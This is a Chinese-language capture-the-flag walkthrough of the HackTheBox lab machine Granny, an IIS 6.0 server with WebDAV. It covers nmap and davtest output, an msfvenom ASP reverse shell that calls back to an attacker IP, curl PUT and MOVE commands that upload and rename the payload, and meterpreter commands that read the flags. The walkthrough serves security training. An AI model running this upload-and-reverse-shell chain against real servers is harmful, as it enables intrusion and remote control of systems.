Granny - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/14

• 10.10.10.15

端口扫描

只有一个80:

$ nmap -sC -sV 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 13:29 CST
Nmap scan report for 10.10.10.15
Host is up (0.068s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-ntlm-info:
|   Target_Name: GRANNY
|   NetBIOS_Domain_Name: GRANNY
|   NetBIOS_Computer_Name: GRANNY
|   DNS_Domain_Name: granny
|   DNS_Computer_Name: granny
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Server Date: Fri, 25 Dec 2020 05:30:23 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/6.0
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.88 seconds

80

IIS默认页面：

WebDAV

和grandpa基本一样的环境，可以换个方式从webdav打：

davtest

davtest显示可以不能直接put asp，可以put txt后MOVE：

➜  ~ davtest --url http://10.10.10.15
********************************************************
 Testing DAV connection
OPEN		SUCCEED:		http://10.10.10.15
********************************************************
NOTE	Random string for this session: 6YBKu7grFOa_YTc
********************************************************
 Creating directory
MKCOL		SUCCEED:		Created http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc
********************************************************
 Sending test files
PUT	php	SUCCEED:	http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.php
PUT	asp	FAIL
PUT	cfm	SUCCEED:	http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.cfm
PUT	pl	SUCCEED:	http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.pl
PUT	aspx	FAIL
PUT	jhtml	SUCCEED:	http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.jhtml
PUT	cgi	FAIL
PUT	html	SUCCEED:	http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.html
PUT	txt	SUCCEED:	http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.txt
PUT	jsp	SUCCEED:	http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.jsp
PUT	shtml	FAIL
********************************************************
 Checking for test file execution
EXEC	php	FAIL
EXEC	cfm	FAIL
EXEC	pl	FAIL
EXEC	jhtml	FAIL
EXEC	html	SUCCEED:	http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.html
EXEC	txt	SUCCEED:	http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.txt
EXEC	jsp	FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.php
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.cfm
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.pl
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.jhtml
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.html
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.txt
PUT File: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.jsp
Executes: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.html
Executes: http://10.10.10.15/DavTestDir_6YBKu7grFOa_YTc/davtest_6YBKu7grFOa_YTc.txt

exploit

那就msf生成asp shell，put，move，访问触发：

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4445 -f asp > miao.txt
# msfvenom -p windows/meterpreter/reverse_tcp_allports LHOST=10.10.14.6 LPORT=4445 -f asp > miao.txt
curl -T 'miao.txt' http://10.10.10.15/miao.txt   # 上传txt文件到granny服务上
curl -X MOVE --header 'Destination:http://10.10.10.15/miao.asp' 'http://10.10.10.15/miao.txt'   # txt改名asp
curl 'http://10.10.10.15/miao.asp'   # 访问asp文件触发shell

提权

提权也是一样，post/multi/recon/local_exploit_suggester， 然后随便选一个：

flags

然后就是读取flag：

meterpreter > search -f user.txt
Found 1 result...
    c:\Documents and Settings\Lakis\Desktop\user.txt (32 bytes)
meterpreter > search -f root.txt
Found 1 result...
    c:\Documents and Settings\Administrator\Desktop\root.txt (32 bytes)
meterpreter > cd 'c:\Documents and Settings'


meterpreter > cat Lakis/Desktop/user.txt
meterpreter > cat Administrator/Desktop/root.txt

参考资料

• HTB: Granny | 0xdf hacks stuff
  https://0xdf.gitlab.io/2019/03/06/htb-granny.html#webdav
• https://www.hackthebox.eu/home/machines/writeup/14
• HackTheBox - Granny and Grandpa - YouTube
  https://www.youtube.com/watch?v=ZfPVGJGkORQ&feature=youtu.be&ab_channel=IppSec